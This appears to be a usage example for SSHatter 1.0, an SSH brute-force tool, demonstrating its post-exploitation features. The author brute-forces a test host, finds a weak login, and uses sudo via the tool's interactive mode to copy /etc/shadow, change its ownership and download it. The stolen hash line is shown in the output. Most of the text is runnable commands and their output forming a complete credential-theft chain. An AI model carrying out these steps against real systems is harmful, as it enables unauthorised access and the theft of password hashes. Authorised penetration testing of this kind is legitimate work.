Example
As you can see, I enumerated just one host (10.31.33.7) and found one user "y" with a password of "y". Now that's where the old SSHatter would stop, but hold on a minute, SSHatter 1.0 has a bunch of features for post brute force exploration: As you can see, I reran SSHatter with the -i flag which tells it that I want to use it in interactive mode. I was able to confirm my id and then make a call to sudo. Later versions of this popular access control tool have the -S flag which tells it to take a password from the STDIO and not from the psuedo terminal. This combined with the -0 flag allows us to pass our newly discovered password through and executed commands as root. As you can see, I use this feature to take a copy of /etc/shadow and once changing it's ownership I issue the get command to download it:
x@localhost:~$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22
x@localhost:~$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p -0 -s -i
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22
W: executing in interactive mode, continue? [y/N] y
$ id
[y:y@10.31.33.7:22]$ id
uid=1002(y) gid=1003(y) groups=1003(y)
$ sudo -S -l
[y:y@10.31.33.7:22]$ sudo -S -l
Matching Defaults entries for y on this host:
env_reset
User y may run the following commands on this host:
(ALL) ALL
$ sudo -S cp /etc/shadow shadow
[y:y@10.31.33.7:22]$ sudo -S cp /etc/shadow shadow
$ sudo -S chown y shadow
[y:y@10.31.33.7:22]$ sudo -S chown y shadow
$ get shadow
[y:y@10.31.33.7:22]$ cat shadow
$ exit
x@localhost:~$ cat y@10.31.33.7:22-shadow | grep y
y:$8$ko3ACbLg$sI2Nq02nmGDPxSqJ9UA3zxTDOp5oNTSCKmAlDtbawyfc8NbR8qXmmVGHeHn2183UWrY0Ie8wlO/yf2dhiXHPP/:14554:0:99999:7:::
Sure enough, I now have a copy of the shadow file on my local system. 